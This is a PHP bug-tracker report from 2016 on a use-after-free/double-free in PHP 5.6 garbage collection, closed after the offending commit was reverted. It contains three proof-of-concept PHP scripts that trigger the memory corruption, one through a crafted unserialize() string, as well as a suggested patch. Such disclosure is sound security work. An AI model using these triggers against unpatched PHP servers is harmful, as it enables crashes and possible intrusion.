PHP :: Bug #72605 :: Use After Free/Double Free in Garbage Collection

Bug #72605	Use After Free/Double Free in Garbage Collection
Submitted:	2016-07-16 03:56 UTC	Modified:	2016-07-26 22:28 UTC
From:	taoguangchen at icloud dot com	Assigned:	dmitry (profile)
Status:	Closed	Package:	*General Issues
PHP Version:	5.6Git-2016-07-16 (Git)	OS:
Private report:	No	CVE-ID:	None

View Developer Edit

[2016-07-16 03:56 UTC] taoguangchen at icloud dot com

Description:
------------
It is possible to lead to use-after-free/double-free vulnerability since @dmitry added this commit 1c84b55adea936b065a20102202bea3d1d243225 to PHP5 series.

PoC1:
```
<?php

$std = new stdClass;
$val = &$std;
$std->x = $val;
$arr = [$std];
$ref = $arr[0];
unset($arr);
gc_collect_cycles();

?>
```

PoC2:
```
<?php

$dll = new SplDoublyLinkedList;
$val = &$dll;
$dll->push($val);
$arr = [$dll];
$ref = $arr[0];
unset($arr);
gc_collect_cycles();

?>
```

PoC3:
```
<?php

$inr = 'i:0;:R:2;';
$uns = 'a:1:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inr).':{'.$inr.'}}';
$arr = unserialize($uns);
$ref = $arr[0];
unset($arr);
gc_collect_cycles();

?>
```

Fix:
```
+if (obj->refcount <= 0 ) {
	obj->refcount = 1;
+}
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-07-16 18:43 UTC] stas@php.net

-Type: Security +Type: Bug -Assigned To: +Assigned To: dmitry

[2016-07-26 22:28 UTC] nikic@php.net

-Status: Assigned +Status: Closed

[2016-07-26 22:28 UTC] nikic@php.net

The offending commit has been reverted some time ago (https://github.com/php/php-src/commit/171c759d791f809ebc31711fd0b0b5bb632cd2cc), so closing here.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Wed Nov 05 06:00:01 2025 UTC